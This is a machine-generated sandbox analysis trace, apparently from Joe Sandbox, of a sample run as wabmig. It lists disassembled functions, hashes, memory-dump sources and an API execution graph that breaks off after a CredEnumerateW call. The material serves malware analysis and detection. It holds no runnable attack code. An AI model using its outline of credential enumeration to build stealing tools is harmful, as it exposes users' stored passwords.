                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                            • String ID:
                                                                            • API String ID: 2652629310-0
                                                                            • Opcode ID: 33afa8e9f3b816e37a4cf045b25b79af71f326a6f138d162e646dd3ba6b0aa09
                                                                            • Instruction ID: 0a8986320494810a71daefa783093284a96e69fdfee235a9e7072b045b34f1bf
                                                                            • Opcode Fuzzy Hash: 33afa8e9f3b816e37a4cf045b25b79af71f326a6f138d162e646dd3ba6b0aa09
                                                                            • Instruction Fuzzy Hash: 333122B6A0021AABCF249F64CC84DAF7BA6EF01310F0401A9FD04DB190E735D998CB90
                                                                            Function 23235CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,23231D66,00000000,00000000,?,23235C88,23231D66,00000000,00000000,00000000,?,23235E85,00000006,FlsSetValue), ref: 23235D13
                                                                            • GetLastError.KERNEL32(?,23235C88,23231D66,00000000,00000000,00000000,?,23235E85,00000006,FlsSetValue,2323E190,FlsSetValue,00000000,00000364,?,23235BC8), ref: 23235D1F
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,23235C88,23231D66,00000000,00000000,00000000,?,23235E85,00000006,FlsSetValue,2323E190,FlsSetValue,00000000), ref: 23235D2D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 3177248105-0
                                                                            • Opcode ID: 35bd82f172ec82f89e68b899774117fda0c860c58146f8c0384465f107516352
                                                                            • Instruction ID: 1201946a5624d2fd2f7033480d1084cb66beb2dc3f08b8a68514c1e4977fad70
                                                                            • Opcode Fuzzy Hash: 35bd82f172ec82f89e68b899774117fda0c860c58146f8c0384465f107516352
                                                                            • Instruction Fuzzy Hash: C401F7B671122BABC3116A689C8CEA6375CEF16BA17244A61FA0ED7140D724D881CAE0
                                                                            Function 232363F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 2323655C
                                                                              • Part of subcall function 232362BC: IsProcessorFeaturePresent.KERNEL32(00000017,232362AB,00000000,?,?,?,?,00000016,?,?,232362B8,00000000,00000000,00000000,00000000,00000000), ref: 232362BE
                                                                              • Part of subcall function 232362BC: GetCurrentProcess.KERNEL32(C0000417), ref: 232362E0
                                                                              • Part of subcall function 232362BC: TerminateProcess.KERNEL32(00000000), ref: 232362E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                            • String ID: *?$.
                                                                            • API String ID: 2667617558-3972193922
                                                                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                            • Instruction ID: f8b946eaf6718b62cfa6fc7ab461bf6447235fa51c30db683b4c2abc958b6a6e
                                                                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                            • Instruction Fuzzy Hash: 2351C3B1E0020A9FDF14DFA8CCC0AADBBF9EF59314F2481A9D554E7300E675AA418B50
                                                                            Function 232316AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: : $Se.
                                                                            • API String ID: 4218353326-4089948878
                                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                            • Instruction ID: 1a1808e0c6c905906fd40e134cb264d56208bb3665e0e901f06359912ad21bef
                                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                            • Instruction Fuzzy Hash: 3811C8B6A043496EC710DFA8DC40BDDFBFC9F1A204F1440D6E545E7212E67066428765
                                                                            Function 23231EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 23232903
                                                                              • Part of subcall function 232335D2: RaiseException.KERNEL32(?,?,?,23232925,00000000,00000000,00000000,?,?,?,?,?,23232925,?,232421B8), ref: 23233632
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 23232920
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                            • String ID: Unknown exception
                                                                            • API String ID: 3476068407-410509341
                                                                            • Opcode ID: 6e9e2ca29f96b6e284dd853c0c828bfe59dffc7cdefe8622fa582220b5904338
                                                                            • Instruction ID: 99dcf8d8b4e05a700a39d03e345a8893364af76aadbb8955d4a846b6af1ef986
                                                                            • Opcode Fuzzy Hash: 6e9e2ca29f96b6e284dd853c0c828bfe59dffc7cdefe8622fa582220b5904338
                                                                            • Instruction Fuzzy Hash: 26F022B4A2430D778B04B6A5EC449AD776C9F13A50BA041F1EB24D6491EBB0FAD6C5D0
                                                                            Function 232369F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetOEMCP.KERNEL32(00000000,?,?,23236C7C,?), ref: 23236A1E
                                                                            • GetACP.KERNEL32(00000000,?,?,23236C7C,?), ref: 23236A35
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: |l##
                                                                            • API String ID: 0-1571746927
                                                                            • Opcode ID: ff7fea0ee0444ca53a11f31d0a0bd104601b74c063251bd7d0bebb38a37e2ecc
                                                                            • Instruction ID: 52f4c81e1529e28b40e19dfc51854809000e1de3a25f55ee7f8721977bbb758e
                                                                            • Opcode Fuzzy Hash: ff7fea0ee0444ca53a11f31d0a0bd104601b74c063251bd7d0bebb38a37e2ecc
                                                                            • Instruction Fuzzy Hash: 8CF04FB05006098BD710EBA4D98C7AC7778FB12335F288385EA788A1D1DB759995CB45

                                                                            Execution Graph

                                                                            Execution Coverage:6.3%
                                                                            Dynamic/Decrypted Code Coverage:9.2%
                                                                            Signature Coverage:1.5%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:74
                                                                            execution_graph 37604 4466f4 37623 446904 37604->37623 37606 446700 GetModuleHandleA 37609 446710 __set_app_type __p__fmode __p__commode 37606->37609 37608 4467a4 37610 4467ac __setusermatherr 37608->37610 37611 4467b8 37608->37611 37609->37608 37610->37611 37624 4468f0 _controlfp 37611->37624 37613 4467bd _initterm __wgetmainargs _initterm 37614 44681e GetStartupInfoW 37613->37614 37615 446810 37613->37615 37617 446866 GetModuleHandleA 37614->37617 37625 41276d 37617->37625 37621 446896 exit 37622 44689d _cexit 37621->37622 37622->37615 37623->37606 37624->37613 37626 41277d 37625->37626 37668 4044a4 LoadLibraryW 37626->37668 37628 412785 37629 412789 37628->37629 37676 414b81 37628->37676 37629->37621 37629->37622 37632 4127c8 37682 412465 memset ??2@YAPAXI 37632->37682 37634 4127ea 37694 40ac21 37634->37694 37639 412813 37712 40dd07 memset 37639->37712 37640 412827 37717 40db69 memset 37640->37717 37643 412822 37738 4125b6 ??3@YAXPAX 37643->37738 37645 40ada2 _wcsicmp 37647 41283d 37645->37647 37647->37643 37650 412863 CoInitialize 37647->37650 37722 41268e 37647->37722 37742 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37650->37742 37652 41296f 37744 40b633 37652->37744 37654 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37660 412957 CoUninitialize 37654->37660 37663 4128ca 37654->37663 37660->37643 37661 4128d0 TranslateAcceleratorW 37662 412941 GetMessageW 37661->37662 37661->37663 37662->37660 37662->37661 37663->37661 37664 412909 IsDialogMessageW 37663->37664 37665 4128fd IsDialogMessageW 37663->37665 37666 41292b TranslateMessage DispatchMessageW 37663->37666 37667 41291f IsDialogMessageW 37663->37667 37664->37662 37664->37663 37665->37662 37665->37664 37666->37662 37667->37662 37667->37666 37669 4044cf GetProcAddress 37668->37669 37672 4044f7 37668->37672 37670 4044e8 FreeLibrary 37669->37670 37673 4044df 37669->37673 37671 4044f3 37670->37671 37670->37672 37671->37672 37674 404507 MessageBoxW 37672->37674 37675 40451e 37672->37675 37673->37670 37674->37628 37675->37628 37677 414b8a 37676->37677 37678 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37676->37678 37748 40a804 memset 37677->37748 37678->37632 37681 414b9e GetProcAddress 37681->37678 37683 4124e0 37682->37683 37684 412505 ??2@YAPAXI 37683->37684 37685 41251c 37684->37685 37687 412521 37684->37687 37770 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37685->37770 37759 444722 37687->37759 37693 41259b wcscpy 37693->37634 37775 40b1ab free free 37694->37775 37698 40a9ce malloc memcpy free free 37705 40ac5c 37698->37705 37699 40ad4b 37707 40ad76 37699->37707 37799 40a9ce 37699->37799 37701 40ace7 free 37701->37705 37705->37698 37705->37699 37705->37701 37705->37707 37779 40a8d0 37705->37779 37791 4099f4 37705->37791 37706 40a8d0 7 API calls 37706->37707 37776 40aa04 37707->37776 37708 40ada2 37709 40adc9 37708->37709 37710 40adaa 37708->37710 37709->37639 37709->37640 37710->37709 37711 40adb3 _wcsicmp 37710->37711 37711->37709 37711->37710 37804 40dce0 37712->37804 37714 40dd3a GetModuleHandleW 37809 40dba7 37714->37809 37718 40dce0 3 API calls 37717->37718 37719 40db99 37718->37719 37881 40dae1 37719->37881 37895 402f3a 37722->37895 37724 412766 37724->37643 37724->37650 37725 4126d3 _wcsicmp 37726 4126a8 37725->37726 37726->37724 37726->37725 37728 41270a 37726->37728 37929 4125f8 7 API calls 37726->37929 37728->37724 37898 411ac5 37728->37898 37739 4125da 37738->37739 37740 4125f0 37739->37740 37741 4125e6 DeleteObject 37739->37741 37743 40b1ab free free 37740->37743 37741->37740 37742->37654 37743->37652 37745 40b640 37744->37745 37746 40b639 free 37744->37746 37747 40b1ab free free 37745->37747 37746->37745 37747->37629 37749 40a83b GetSystemDirectoryW 37748->37749 37750 40a84c wcscpy 37748->37750 37749->37750 37755 409719 wcslen 37750->37755 37753 40a881 LoadLibraryW 37754 40a886 37753->37754 37754->37678 37754->37681 37756 409724 37755->37756 37757 409739 wcscat LoadLibraryW 37755->37757 37756->37757 37758 40972c wcscat 37756->37758 37757->37753 37757->37754 37758->37757 37760 444732 37759->37760 37761 444728 DeleteObject 37759->37761 37771 409cc3 37760->37771 37761->37760 37763 412551 37764 4010f9 37763->37764 37765 401130 37764->37765 37766 401134 GetModuleHandleW LoadIconW 37765->37766 37767 401107 wcsncat 37765->37767 37768 40a7be 37766->37768 37767->37765 37769 40a7d2 37768->37769 37769->37693 37769->37769 37770->37687 37774 409bfd memset wcscpy 37771->37774 37773 409cdb CreateFontIndirectW 37773->37763 37774->37773 37775->37705 37777 40aa14 37776->37777 37778 40aa0a free 37776->37778 37777->37708 37778->37777 37780 40a8eb 37779->37780 37781 40a8df wcslen 37779->37781 37782 40a906 free 37780->37782 37783 40a90f 37780->37783 37781->37780 37784 40a919 37782->37784 37785 4099f4 3 API calls 37783->37785 37786 40a932 37784->37786 37787 40a929 free 37784->37787 37785->37784 37789 4099f4 3 API calls 37786->37789 37788 40a93e memcpy 37787->37788 37788->37705 37790 40a93d 37789->37790 37790->37788 37792 409a41 37791->37792 37793 4099fb malloc 37791->37793 37792->37705 37795 409a37 37793->37795 37796 409a1c 37793->37796 37795->37705 37797 409a30 free 37796->37797 37798 409a20 memcpy 37796->37798 37797->37795 37798->37797 37800 40a9e7 37799->37800 37801 40a9dc free 37799->37801 37802 4099f4 3 API calls 37800->37802 37803 40a9f2 37801->37803 37802->37803 37803->37706 37828 409bca GetModuleFileNameW 37804->37828 37806 40dce6 wcsrchr 37807 40dcf5 37806->37807 37808 40dcf9 wcscat 37806->37808 37807->37808 37808->37714 37829 44db70 37809->37829 37813 40dbfd 37832 4447d9 37813->37832 37816 40dc34 wcscpy wcscpy 37858 40d6f5 37816->37858 37817 40dc1f wcscpy 37817->37816 37820 40d6f5 3 API calls 37821 40dc73 37820->37821 37822 40d6f5 3 API calls 37821->37822 37823 40dc89 37822->37823 37824 40d6f5 3 API calls 37823->37824 37825 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37824->37825 37864 40da80 37825->37864 37828->37806 37830 40dbb4 memset memset 37829->37830 37831 409bca GetModuleFileNameW 37830->37831 37831->37813 37834 4447f4 37832->37834 37833 40dc1b 37833->37816 37833->37817 37834->37833 37835 444807 ??2@YAPAXI 37834->37835 37836 44481f 37835->37836 37837 444873 _snwprintf 37836->37837 37838 4448ab wcscpy 37836->37838 37871 44474a 8 API calls 37837->37871 37840 4448bb 37838->37840 37872 44474a 8 API calls 37840->37872 37841 4448a7 37841->37838 37841->37840 37843 4448cd 37873 44474a 8 API calls 37843->37873 37845 4448e2 37874 44474a 8 API calls 37845->37874 37847 4448f7 37875 44474a 8 API calls 37847->37875 37849 44490c 37876 44474a 8 API calls 37849->37876 37851 444921 37877 44474a 8 API calls 37851->37877 37853 444936 37878 44474a 8 API calls 37853->37878 37855 44494b 37879 44474a 8 API calls 37855->37879 37857 444960 ??3@YAXPAX 37857->37833 37859 44db70 37858->37859 37860 40d702 memset GetPrivateProfileStringW 37859->37860 37861 40d752 37860->37861 37862 40d75c WritePrivateProfileStringW 37860->37862 37861->37862 37863 40d758 37861->37863 37862->37863 37863->37820 37865 44db70 37864->37865 37866 40da8d memset 37865->37866 37867 40daac LoadStringW 37866->37867 37868 40dac6 37867->37868 37868->37867 37870 40dade 37868->37870 37880 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37868->37880 37870->37643 37871->37841 37872->37843 37873->37845 37874->37847 37875->37849 37876->37851 37877->37853 37878->37855 37879->37857 37880->37868 37891 409b98 GetFileAttributesW 37881->37891 37883 40daea 37884 40db63 37883->37884 37885 40daef wcscpy wcscpy GetPrivateProfileIntW 37883->37885 37884->37645 37892 40d65d GetPrivateProfileStringW 37885->37892 37887 40db3e 37893 40d65d GetPrivateProfileStringW 37887->37893 37889 40db4f 37894 40d65d GetPrivateProfileStringW 37889->37894 37891->37883 37892->37887 37893->37889 37894->37884 37930 40eaff 37895->37930 37899 411ae2 memset 37898->37899 37900 411b8f 37898->37900 37970 409bca GetModuleFileNameW 37899->37970 37912 411a8b 37900->37912 37902 411b0a wcsrchr 37903 411b22 wcscat 37902->37903 37904 411b1f 37902->37904 37971 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37903->37971 37904->37903 37906 411b67 37972 402afb 37906->37972 37910 411b7f 38028 40ea13 SendMessageW memset SendMessageW 37910->38028 37913 402afb 27 API calls 37912->37913 37914 411ac0 37913->37914 37915 4110dc 37914->37915 37916 41113e 37915->37916 37921 4110f0 37915->37921 38053 40969c LoadCursorW SetCursor 37916->38053 37918 411143 38054 4032b4 37918->38054 38072 444a54 37918->38072 37919 4110f7 _wcsicmp 37919->37921 37920 411157 37922 40ada2 _wcsicmp 37920->37922 37921->37916 37921->37919 38075 410c46 10 API calls 37921->38075 37925 411167 37922->37925 37923 4111af 37925->37923 37926 4111a6 qsort 37925->37926 37926->37923 37929->37726 37931 40eb10 37930->37931 37943 40e8e0 37931->37943 37934 40eb6c memcpy memcpy 37935 40ebb7 37934->37935 37935->37934 37936 40ebf2 ??2@YAPAXI ??2@YAPAXI 37935->37936 37939 40d134 16 API calls 37935->37939 37937 40ec2e ??2@YAPAXI 37936->37937 37940 40ec65 37936->37940 37937->37940 37939->37935 37940->37940 37953 40ea7f 37940->37953 37942 402f49 37942->37726 37944 40e8f2 37943->37944 37945 40e8eb ??3@YAXPAX 37943->37945 37946 40e900 37944->37946 37947 40e8f9 ??3@YAXPAX 37944->37947 37945->37944 37948 40e90a ??3@YAXPAX 37946->37948 37950 40e911 37946->37950 37947->37946 37948->37950 37949 40e931 ??2@YAPAXI ??2@YAPAXI 37949->37934 37950->37949 37951 40e921 ??3@YAXPAX 37950->37951 37952 40e92a ??3@YAXPAX 37950->37952 37951->37952 37952->37949 37954 40aa04 free 37953->37954 37955 40ea88 37954->37955 37956 40aa04 free 37955->37956 37957 40ea90 37956->37957 37958 40aa04 free 37957->37958 37959 40ea98 37958->37959 37960 40aa04 free 37959->37960 37961 40eaa0 37960->37961 37962 40a9ce 4 API calls 37961->37962 37963 40eab3 37962->37963 37964 40a9ce 4 API calls 37963->37964 37965 40eabd 37964->37965 37966 40a9ce 4 API calls 37965->37966 37967 40eac7 37966->37967 37968 40a9ce 4 API calls 37967->37968 37969 40ead1 37968->37969 37969->37942 37970->37902 37971->37906 38029 40b2cc 37972->38029 37974 402b0a 37975 40b2cc 27 API calls 37974->37975 37976 402b23 37975->37976 37977 40b2cc 27 API calls 37976->37977 37978 402b3a 37977->37978 37979 40b2cc 27 API calls 37978->37979 37980 402b54 37979->37980 37981 40b2cc 27 API calls 37980->37981 37982 402b6b 37981->37982 37983 40b2cc 27 API calls 37982->37983 37984 402b82 37983->37984 37985 40b2cc 27 API calls 37984->37985 37986 402b99 37985->37986 37987 40b2cc 27 API calls 37986->37987 37988 402bb0 37987->37988 37989 40b2cc 27 API calls 37988->37989 37990 402bc7 37989->37990 37991 40b2cc 27 API calls 37990->37991 37992 402bde 37991->37992 37993 40b2cc 27 API calls 37992->37993 37994 402bf5 37993->37994 37995 40b2cc 27 API calls 37994->37995 37996 402c0c 37995->37996 37997 40b2cc 27 API calls 37996->37997 37998 402c23 37997->37998 37999 40b2cc 27 API calls 37998->37999 38000 402c3a 37999->38000 38001 40b2cc 27 API calls 38000->38001 38002 402c51 38001->38002 38003 40b2cc 27 API calls 38002->38003 38004 402c68 38003->38004 38005 40b2cc 27 API calls 38004->38005 38006 402c7f 38005->38006 38007 40b2cc 27 API calls 38006->38007 38008 402c99 38007->38008 38009 40b2cc 27 API calls 38008->38009 38010 402cb3 38009->38010 38011 40b2cc 27 API calls 38010->38011 38012 402cd5 38011->38012 38013 40b2cc 27 API calls 38012->38013 38014 402cf0 38013->38014 38015 40b2cc 27 API calls 38014->38015 38016 402d0b 38015->38016 38017 40b2cc 27 API calls 38016->38017 38018 402d26 38017->38018 38019 40b2cc 27 API calls 38018->38019 38020 402d3e 38019->38020 38021 40b2cc 27 API calls 38020->38021 38022 402d59 38021->38022 38023 40b2cc 27 API calls 38022->38023 38024 402d78 38023->38024 38025 40b2cc 27 API calls 38024->38025 38026 402d93 38025->38026 38027 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38026->38027 38027->37910 38028->37900 38032 40b58d 38029->38032 38031 40b2d1 38031->37974 38033 40b5a4 GetModuleHandleW FindResourceW 38032->38033 38034 40b62e 38032->38034 38035 40b5c2 LoadResource 38033->38035 38037 40b5e7 38033->38037 38034->38031 38036 40b5d0 SizeofResource LockResource 38035->38036 38035->38037 38036->38037 38037->38034 38045 40afcf 38037->38045 38039 40b608 memcpy 38048 40b4d3 memcpy 38039->38048 38041 40b61e 38049 40b3c1 18 API calls 38041->38049 38043 40b626 38050 40b04b 38043->38050 38046 40b04b ??3@YAXPAX 38045->38046 38047 40afd7 ??2@YAPAXI 38046->38047 38047->38039 38048->38041 38049->38043 38051 40b051 ??3@YAXPAX 38050->38051 38052 40b05f 38050->38052 38051->38052 38052->38034 38053->37918 38055 4032c4 38054->38055 38056 40b633 free 38055->38056 38057 403316 38056->38057 38076 44553b 38057->38076 38061 403480 38274 40368c 15 API calls 38061->38274 38063 403489 38064 40b633 free 38063->38064 38065 403495 38064->38065 38065->37920 38066 4033a9 memset memcpy 38067 4033ec wcscmp 38066->38067 38068 40333c 38066->38068 38067->38068 38068->38061 38068->38066 38068->38067 38272 4028e7 11 API calls 38068->38272 38273 40f508 6 API calls 38068->38273 38070 403421 _wcsicmp 38070->38068 38073 444a64 FreeLibrary 38072->38073 38074 444a83 38072->38074 38073->38074 38074->37920 38075->37921 38077 445548 38076->38077 38078 445599 38077->38078 38275 40c768 38077->38275 38079 4455a8 memset 38078->38079 38086 4457f2 38078->38086 38358 403988 38079->38358 38090 445854 38086->38090 38460 403e2d memset memset memset memset memset 38086->38460 38087 4458bb memset memset 38091 414c2e 16 API calls 38087->38091 38088 445672 38369 403fbe memset memset memset memset memset 38088->38369 38139 4458aa 38090->38139 38483 403c9c memset memset memset memset memset 38090->38483 38096 4458f9 38091->38096 38092 4455e5 38092->38088 38103 44560f 38092->38103 38093 44557a 38137 44558c 38093->38137 38555 4136c0 CoTaskMemFree 38093->38555 38095 44595e memset memset 38100 414c2e 16 API calls 38095->38100 38102 40b2cc 27 API calls 38096->38102 38098 445823 38144 4087b3 338 API calls 38098->38144 38163 445849 38098->38163 38099 445a00 memset memset 38506 414c2e 38099->38506 38101 44599c 38100->38101 38109 40b2cc 27 API calls 38101->38109 38110 445909 38102->38110 38112 4087b3 338 API calls 38103->38112 38105 445b38 memset memset memset 38114 445bd4 38105->38114 38115 445b98 38105->38115 38122 4459ac 38109->38122 38120 409d1f 6 API calls 38110->38120 38111 445c8b memset memset 38123 414c2e 16 API calls 38111->38123 38121 445621 38112->38121 38113 445585 38556 41366b FreeLibrary 38113->38556 38118 414c2e 16 API calls 38114->38118 38115->38114 38126 445ba2 38115->38126 38131 445be2 38118->38131 38119 403335 38271 4452e5 45 API calls 38119->38271 38134 445919 38120->38134 38557 4454bf 20 API calls 38121->38557 38135 409d1f 6 API calls 38122->38135 38136 445cc9 38123->38136 38125 445879 38156 4087b3 338 API calls 38125->38156 38178 44589f 38125->38178 38644 4099c6 wcslen 38126->38644 38127 4456b2 38559 40b1ab free free 38127->38559 38129 40b2cc 27 API calls 38140 445a4f 38129->38140 38142 40b2cc 27 API calls 38131->38142 38132 445d3d 38161 40b2cc 27 API calls 38132->38161 38133 445d88 memset memset memset 38145 414c2e 16 API calls 38133->38145 38573 409b98 GetFileAttributesW 38134->38573 38146 4459bc 38135->38146 38147 409d1f 6 API calls 38136->38147 38342 444b06 38137->38342 38139->38087 38162 44594a 38139->38162 38521 409d1f wcslen wcslen 38140->38521 38150 445bf3 38142->38150 38144->38098 38153 445dde 38145->38153 38640 409b98 GetFileAttributesW 38146->38640 38155 445ce1 38147->38155 38148 445bb3 38647 445403 memset 38148->38647 38160 409d1f 6 API calls 38150->38160 38151 445928 38151->38162 38574 40b6ef 38151->38574 38164 40b2cc 27 API calls 38153->38164 38664 409b98 GetFileAttributesW 38155->38664 38156->38125 38158 445680 38158->38127 38392 4087b3 memset 38158->38392 38159 40b2cc 27 API calls 38169 445a94 38159->38169 38171 445c07 38160->38171 38172 445d54 _wcsicmp 38161->38172 38162->38095 38176 4459ed 38162->38176 38571 40b1ab free free 38163->38571 38175 445def 38164->38175 38165 4459cb 38165->38176 38186 40b6ef 252 API calls 38165->38186 38526 40ae18 38169->38526 38170 44566d 38170->38086 38443 413d4c 38170->38443 38182 445389 258 API calls 38171->38182 38183 445d71 38172->38183 38248 445d67 38172->38248 38174 445665 38558 40b1ab free free 38174->38558 38184 409d1f 6 API calls 38175->38184 38176->38099 38219 445b22 38176->38219 38177 445cf0 38177->38119 38177->38132 38177->38133 38572 40b1ab free free 38178->38572 38179 445389 258 API calls 38187 445bca 38179->38187 38189 445c17 38182->38189 38665 445093 23 API calls 38183->38665 38192 445e03 38184->38192 38186->38176 38187->38111 38187->38177 38188 4456d8 38194 40b2cc 27 API calls 38188->38194 38195 40b2cc 27 API calls 38189->38195 38191 44563c 38191->38174 38197 4087b3 338 API calls 38191->38197 38666 409b98 GetFileAttributesW 38192->38666 38193 40b6ef 252 API calls 38193->38119 38199 4456e2 38194->38199 38200 445c23 38195->38200 38196 445d83 38196->38119 38197->38191 38560 413fa6 _wcsicmp _wcsicmp 38199->38560 38204 409d1f 6 API calls 38200->38204 38202 445e12 38208 445e6b 38202->38208 38215 40b2cc 27 API calls 38202->38215 38206 445c37 38204->38206 38205 4456eb 38211 4456fd memset memset memset memset 38205->38211 38212 4457ea 38205->38212 38213 445389 258 API calls 38206->38213 38207 445b17 38641 40aebe 38207->38641 38668 445093 23 API calls 38208->38668 38561 409c70 wcscpy wcsrchr 38211->38561 38564 413d29 38212->38564 38218 445c47 38213->38218 38220 445e33 38215->38220 38216 445e7e 38222 445f67 38216->38222 38225 40b2cc 27 API calls 38218->38225 38219->38105 38219->38187 38226 409d1f 6 API calls 38220->38226 38231 40b2cc 27 API calls 38222->38231 38223 445ab2 memset 38227 40b2cc 27 API calls 38223->38227 38229 445c53 38225->38229 38230 445e47 38226->38230 38232 445aa1 38227->38232 38228 409c70 2 API calls 38233 44577e 38228->38233 38234 409d1f 6 API calls 38229->38234 38667 409b98 GetFileAttributesW 38230->38667 38236 445f73 38231->38236 38232->38207 38232->38223 38237 409d1f 6 API calls 38232->38237 38533 40add4 38232->38533 38538 445389 38232->38538 38547 40ae51 38232->38547 38238 409c70 2 API calls 38233->38238 38239 445c67 38234->38239 38241 409d1f 6 API calls 38236->38241 38237->38232 38242 44578d 38238->38242 38243 445389 258 API calls 38239->38243 38240 445e56 38240->38208 38245 445e83 memset 38240->38245 38244 445f87 38241->38244 38242->38212 38250 40b2cc 27 API calls 38242->38250 38243->38187 38671 409b98 GetFileAttributesW 38244->38671 38249 40b2cc 27 API calls 38245->38249 38248->38119 38248->38193 38251 445eab 38249->38251 38252 4457a8 38250->38252 38253 409d1f 6 API calls 38251->38253 38254 409d1f 6 API calls 38252->38254 38255 445ebf 38253->38255 38256 4457b8 38254->38256 38257 40ae18 9 API calls 38255->38257 38563 409b98 GetFileAttributesW 38256->38563 38267 445ef5 38257->38267 38259 4457c7 38259->38212 38261 4087b3 338 API calls 38259->38261 38260 40ae51 9 API calls 38260->38267 38261->38212 38262 445f5c 38264 40aebe FindClose 38262->38264 38263 40add4 2 API calls 38263->38267 38264->38222 38265 40b2cc 27 API calls 38265->38267 38266 409d1f 6 API calls 38266->38267 38267->38260 38267->38262 38267->38263 38267->38265 38267->38266 38269 445f3a 38267->38269 38669 409b98 GetFileAttributesW 38267->38669 38670 445093 23 API calls 38269->38670 38271->38068 38272->38070 38273->38068 38274->38063 38276 40c775 38275->38276 38672 40b1ab free free 38276->38672 38278 40c788 38673 40b1ab free free 38278->38673 38280 40c790 38674 40b1ab free free 38280->38674 38282 40c798 38283 40aa04 free 38282->38283 38284 40c7a0 38283->38284 38675 40c274 memset 38284->38675 38289 40a8ab 9 API calls 38290 40c7c3 38289->38290 38291 40a8ab 9 API calls 38290->38291 38292 40c7d0 38291->38292 38704 40c3c3 38292->38704 38296 40c7e5 38297 40c877 38296->38297 38298 40c86c 38296->38298 38304 40c634 49 API calls 38296->38304 38729 40a706 38296->38729 38305 40bdb0 38297->38305 38746 4053fe 39 API calls 38298->38746 38304->38296 38914 404363 38305->38914 38308 40bf5d 38934 40440c 38308->38934 38310 40bdee 38310->38308 38313 40b2cc 27 API calls 38310->38313 38311 40bddf CredEnumerateW 38311->38310 38314 40be02 wcslen 38313->38314 38314->38308 38316 40be1e 